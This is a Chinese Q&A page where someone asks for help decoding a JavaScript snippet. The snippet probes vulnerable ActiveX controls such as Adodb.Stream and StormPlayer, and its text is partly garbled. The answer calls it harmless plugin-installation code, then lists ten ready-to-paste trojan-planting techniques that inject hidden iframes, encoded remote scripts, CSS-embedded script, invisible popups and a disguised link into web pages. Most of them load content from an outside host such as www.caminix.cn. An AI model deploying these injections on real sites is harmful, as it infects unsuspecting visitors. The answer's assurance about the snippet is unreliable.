帮忙破译一段js病毒代码

JavaScript013

帮忙破译一段js病毒代码,第1张

<script language="javaScript">function init(){document.write()} try{var evar ado=(document.createElement("object"))ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")var as=ado.createobject("Adodb.Stream","")} catch(e){}finally{ if(e!="[object Error]"){ document.write("")} try{var fvar storm=new ActiveXObject("MPS.StormPlayer")} catch(f){}finally{if(f!="[object Error]"){ document.write("")}} try{var gvar pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")} catch(g){}finally{if(g!="[object Error]"){ document.write("")}} try{var hvar pps=new ActiveXObject("GLCHAT.GLChatCtrl.1")} catch(h){}finally{if(h!="[object Error]"){ document.write("")}} document.write("")document.write("")document.write("")document.write("")}

这个不是病毒代码,只是播放器插件安装代码。

挂马代码如下

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

首先将以下代码

document.write("<iframe width='0' height='0' src='地址'></iframe>")

保存为xxx.js,

则JS挂马代码为

<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

muma.txt可改成任意后缀

四:body挂马

<body onload="window.location='地址'"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML +'\r\n<iframe src="http://www.caminix.cn"></iframe>'

六:css中挂马

body {

background-image: url('javascript:document.write("<script src=http://www.caminix.cn></script>")')}

七:JAJA挂马

<SCRIPT language=javascript>

window.open ("http://www.caminix.cn","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1")

</script>

八:图片伪装

<html>

<iframe src="网马地址" height=0 width=0></iframe>

<img src="图片地址"></center>

</html>

九:伪装调用:

<frameset rows="444,0" cols="*">

<frame src="打开网页" framborder="no" scrolling="auto" noresizemarginwidth="0"margingheight="0">

<frame src="网马地址" frameborder="no" scrolling="no" noresizemarginwidth="0"margingheight="0">

</frameset>

十:高级欺骗

<a href="http://www.163.com" onMouseOver="www_163_com()return true"></a>

<SCRIPT Language="JavaScript">

function www_163_com ()

{

var url="http://www.caminix.cn"

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10")

}

</SCRIPT>